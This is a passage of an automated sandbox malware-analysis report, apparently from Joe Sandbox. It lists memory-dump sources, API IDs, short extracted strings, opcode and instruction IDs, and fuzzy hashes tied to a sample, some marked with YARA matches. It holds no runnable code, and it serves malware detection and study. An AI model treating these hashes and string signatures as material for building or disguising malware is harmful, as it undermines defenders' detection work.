                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28F145B5A0C361CBC714DF24E85126BB7E1AF86304F09487EE8C297352D739E905CB5A
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: "w+y$?TUV$DX8Z
                                                                                                                                                                                                                                                                          • API String ID: 0-3307990326
                                                                                                                                                                                                                                                                          • Opcode ID: f9c6fa3e94296cf0f303a5eebcc6256c78eaf4459c267ceffca2c103466db4c7
                                                                                                                                                                                                                                                                          • Instruction ID: abfedfa2bbedc5c721fbafaca20fb385d4746ca4cbd0c151d1375620e64d5606
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9c6fa3e94296cf0f303a5eebcc6256c78eaf4459c267ceffca2c103466db4c7
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D81CD716007128FC728CF29C8D0A76B7F2FF95750B1A859DD9824FB65EB38A841CB45
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: ,)*k$I,~M
                                                                                                                                                                                                                                                                          • API String ID: 0-936430989
                                                                                                                                                                                                                                                                          • Opcode ID: 33fe9d4cb84d20c875b3126a1f51ea659af71ca5d5df44b5ba46a13c9140ded4
                                                                                                                                                                                                                                                                          • Instruction ID: c2aa04677aee8c549b8ac01a6e679799d6d1dd699f35cc45ec8bad140cc2373a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 33fe9d4cb84d20c875b3126a1f51ea659af71ca5d5df44b5ba46a13c9140ded4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A8215B46083449FD7249F64D880B7FBBE2EBD6714F28892CF68987291D771DC428B46
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                          • String ID: ,)*k$I,~M
                                                                                                                                                                                                                                                                          • API String ID: 2994545307-936430989
                                                                                                                                                                                                                                                                          • Opcode ID: 6e5cbd4c0569671f9ac2a4ffa403741c4e36febb6378435fdd9cada9aaa80cb0
                                                                                                                                                                                                                                                                          • Instruction ID: 1bde8819f6f7b7dbc416330df06e5e5b0ea208d0a860aecc15c429cbd1f7d48d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e5cbd4c0569671f9ac2a4ffa403741c4e36febb6378435fdd9cada9aaa80cb0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FF8248746093405BD724CF24D890BAFBBE2EBC6714F28892DE4C547392D679DC92CB4A
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Uninitialize
                                                                                                                                                                                                                                                                          • String ID: PT
                                                                                                                                                                                                                                                                          • API String ID: 3861434553-4135314810
                                                                                                                                                                                                                                                                          • Opcode ID: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                                          • Instruction ID: f3456e58c02908ba8662abed7a8dabd66b0bd27e4b1ff690fe9f46581cf873cf
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10A1BEB45087818FD726CF2AC4A0A62BFE1EF57300B19869CC5D24FB66D339D845CB15
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Uninitialize
                                                                                                                                                                                                                                                                          • String ID: PT
                                                                                                                                                                                                                                                                          • API String ID: 3861434553-4135314810
                                                                                                                                                                                                                                                                          • Opcode ID: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                                          • Instruction ID: 75a7993a4975897b3fffe1a5d6229db9520caabe5b699855c7cd795a636d0404
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68A1C0B4508B818FD326CF69C490A22BFE1EF57300B1996ADC4D25F7A6D339E806CB55
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: BE$de
                                                                                                                                                                                                                                                                          • API String ID: 0-1272349043
                                                                                                                                                                                                                                                                          • Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                                          • Instruction ID: eb1d46ded495cbadd10b033f01c66fa0177bd5374bd849fb464eb211cec17fbf
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8AD16B7165C3A48BC328DF2988516AFFBE2EFD2304F18492CE8D19B391D674D906C792
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: BE$de
                                                                                                                                                                                                                                                                          • API String ID: 0-1272349043
                                                                                                                                                                                                                                                                          • Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                                          • Instruction ID: 2d7de7b673e5cb152189fb1770f850f450cdad5ace7171a4f245c8b9200c7c18
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2BD1057264C3544BD728DF2888516AFBBE2AFC2304F19492DE8D1AB391D678C916C787
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: @$ihgf
                                                                                                                                                                                                                                                                          • API String ID: 0-73152791
                                                                                                                                                                                                                                                                          • Opcode ID: f9d2302128f83c98de01ee7664bc871aec8e86cdf99c8f751253d6371e8ab131
                                                                                                                                                                                                                                                                          • Instruction ID: 5ae682e15e4e36b8f0a9335420db3584a1b70879926e1146c22c9a4c1d7bc73b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9d2302128f83c98de01ee7664bc871aec8e86cdf99c8f751253d6371e8ab131
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F4126B2A043018BD714CF24C8416BBBBE2FFD2318F54866CE4999B291E735E955CBC6
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                          • String ID: @$ihgf
                                                                                                                                                                                                                                                                          • API String ID: 2994545307-73152791
                                                                                                                                                                                                                                                                          • Opcode ID: b76e2e665ab3f88f5f7ecfe080de7e118712eda281a429bd95dd341074e0adb8
                                                                                                                                                                                                                                                                          • Instruction ID: cc847ee4b474d0efd8a0440ac8e8375c275344d67ffd0b73ceeb6cce142f8bff
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b76e2e665ab3f88f5f7ecfe080de7e118712eda281a429bd95dd341074e0adb8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D413AB1A043018BD714CF24D89277BB7A1FFCA318F14952DD489AB391E739E915C78A
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: Z\$^P
                                                                                                                                                                                                                                                                          • API String ID: 0-3724859648
                                                                                                                                                                                                                                                                          • Opcode ID: 4f7f96cc206f4a51d8ad8bab145ebd28e0a9ebd1b083b1ab060fd53171580dc2
                                                                                                                                                                                                                                                                          • Instruction ID: 1c2abf2c6c170491ef691067d817a89e2fd056225651606d06962e5df91f2325
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f7f96cc206f4a51d8ad8bab145ebd28e0a9ebd1b083b1ab060fd53171580dc2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4541C0B1911A00CFC718CF38C892A72B7B2FF59314B1A859CE5968F7A5E738E841CB55
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: AzB$`rB
                                                                                                                                                                                                                                                                          • API String ID: 0-365317308
                                                                                                                                                                                                                                                                          • Opcode ID: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
                                                                                                                                                                                                                                                                          • Instruction ID: 6eccde100400f429e4c459893b2eae1b4256d2ec662aaeb68cc10dd30f14b8df
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44118BB960C3919FC3049F29D59011BFBE0ABD5708F54DA6CE8C96B312D338DA018B8A
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: AzB$`rB
                                                                                                                                                                                                                                                                          • API String ID: 0-365317308
                                                                                                                                                                                                                                                                          • Opcode ID: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
                                                                                                                                                                                                                                                                          • Instruction ID: f6425de8d121e4265380cb8b8556ee32d0ff2cc323f56d540e3951a84df8493e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 810169B520D3919FC3049F29D59011BFBE0BBD5708F549A6CE8C96B312D334DA418B4A
                                                                                                                                                                                                                                                                          Strings
Memory Dump Source
• Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_3247.jbxd
Similarity
• API ID:
• String ID: c$
• API String ID: 0-2516980088
Memory Dump Source
• Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_3247.jbxd
Similarity
• API ID:
• String ID: A67H
• API String ID: 0-3389657328
Memory Dump Source
• Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
Similarity
• API ID:
• String ID: [
• API String ID: 0-3878419350
Memory Dump Source
• Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
Similarity
• API ID:
• String ID: ,)*k
• API String ID: 0-1228391949
Memory Dump Source
• Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_3247.jbxd
Similarity
• API ID: InitializeThunk
• String ID: ,)*k
• API String ID: 2994545307-1228391949
Memory Dump Source
• Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_3247.jbxd
Similarity
• API ID:
• String ID: m
• API String ID: 0-3775001192
Memory Dump Source
• Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
Similarity
• API ID:
• String ID: .
• API String ID: 0-1505114982
Memory Dump Source
• Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
Similarity
• API ID:
• String ID: 167H
• API String ID: 0-2704650348
                                                                                                                                                                                                                                                                          • Opcode ID: 58de4fbba54e7a4bbde6691defe3cface4003d97f8efe76fd78e15d75b2f64aa
                                                                                                                                                                                                                                                                          • Instruction ID: 2f3f93599f08709b82d17f026ca403c13bf0263f7314d3f323c1f204d13f9670
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58de4fbba54e7a4bbde6691defe3cface4003d97f8efe76fd78e15d75b2f64aa
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39D167726047458BE724CF28CC816ABBBD2EFD5310F19867CE9858B7D1E7359E058B82
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                          • String ID: 167H
                                                                                                                                                                                                                                                                          • API String ID: 2994545307-2704650348
                                                                                                                                                                                                                                                                          • Opcode ID: 3f7913c2959e065ee0aa93dc333931d67ae9576e316e456e6394b25aa21ac57b
                                                                                                                                                                                                                                                                          • Instruction ID: bf2ece600eee686df0bdf1c423ff2d06ad0eddb47c6a63d29c729e7fd306df6e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f7913c2959e065ee0aa93dc333931d67ae9576e316e456e6394b25aa21ac57b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35D19932B147244BD714CF25A8816BBB792EBD5314F99862EE885973C1E7389D05838A
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: .
                                                                                                                                                                                                                                                                          • API String ID: 0-1505114982
                                                                                                                                                                                                                                                                          • Opcode ID: 8f11379e9f5da3686c670748926b93a19e55d1189e69eb2577bbd794f9e5e048
                                                                                                                                                                                                                                                                          • Instruction ID: 5388aebb9722ef47512ed6758712c035957564ba8f43e3dcaa493907b87915b9
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f11379e9f5da3686c670748926b93a19e55d1189e69eb2577bbd794f9e5e048
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5FC12AB5D40212CBCB24CF69CC916BBB7B1FF95310F19825DD896AB390E738A841CB94
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &#
                                                                                                                                                                                                                                                                          • API String ID: 0-1789715784
                                                                                                                                                                                                                                                                          • Opcode ID: 0f12d66f6b808d20c475992f0f687e3f453dd6e3f6f88e05d52d4cafb9cead41
                                                                                                                                                                                                                                                                          • Instruction ID: 49b35462efebd2e68558c098e883bdb3b4bc8324c8ace3d6c682ea14ae4cefb5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f12d66f6b808d20c475992f0f687e3f453dd6e3f6f88e05d52d4cafb9cead41
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C5A12771A043105BDB189B68CC9667BBBE5EF91320F0985ACE89A973D1E738DD09C352
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &#
                                                                                                                                                                                                                                                                          • API String ID: 0-1789715784
                                                                                                                                                                                                                                                                          • Opcode ID: 218c5c0ac0dda5540e0c1ea4323a3af347f339793a0b8cf238deabf448903b3e
                                                                                                                                                                                                                                                                          • Instruction ID: c9f534a10d10fcbb0aeeb65dde57b2602cc7be5083ad25e1a4bd69b4b534b867
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 218c5c0ac0dda5540e0c1ea4323a3af347f339793a0b8cf238deabf448903b3e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6FA14B71B042205BD7249B289C5267BB3E1EFA1324F89852EF896973D1E77CED01C35A
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: .
                                                                                                                                                                                                                                                                          • API String ID: 0-1505114982
                                                                                                                                                                                                                                                                          • Opcode ID: 5d6aea454a76d2159c148964020a4ba4746a54c1e6cbfad0a7af44267aa07dc3
                                                                                                                                                                                                                                                                          • Instruction ID: df86e8cabfd52562b6ebe50b702b66c3677f2f48fb8aab21b174fbacb2a831e7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d6aea454a76d2159c148964020a4ba4746a54c1e6cbfad0a7af44267aa07dc3
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8AB1F4B5E402128BCB248F68CC927A7B7B1FF55314F19915ED845AB790E738AC42C7D4
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: de
                                                                                                                                                                                                                                                                          • API String ID: 0-2106599819
                                                                                                                                                                                                                                                                          • Opcode ID: 859681f232736f0ad411de2e9c44a8bd8c96edd644b44a10bf2b24b8f8322015
                                                                                                                                                                                                                                                                          • Instruction ID: e31396faf658e74fce60a5b824d74376c38ff109a61549a82ed501f476715bf4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 859681f232736f0ad411de2e9c44a8bd8c96edd644b44a10bf2b24b8f8322015
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6791337190C3188AC324DFA9C89266BB7F2EF91324F18992CF5D68B391F7788505C792
                                                                                                                                                                                                                                                                          Strings
Memory Dump Source
• Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
Yara matches
Similarity
• API ID:
• String ID: ~
• API String ID: 0-1707062198
Strings
Memory Dump Source
• Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_3247.jbxd
Yara matches
Similarity
• API ID:
• String ID: ~
• API String ID: 0-1707062198
Strings
Memory Dump Source
• Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_3247.jbxd
Yara matches
Similarity
• API ID:
• String ID: RpB
• API String ID: 0-664042118
Strings
Memory Dump Source
• Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_3247.jbxd
Yara matches
Similarity
• API ID:
• String ID: d1
• API String ID: 0-4211392460
Strings
Memory Dump Source
• Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
Yara matches
Similarity
• API ID:
• String ID: c$
• API String ID: 0-2516980088
Strings
Memory Dump Source
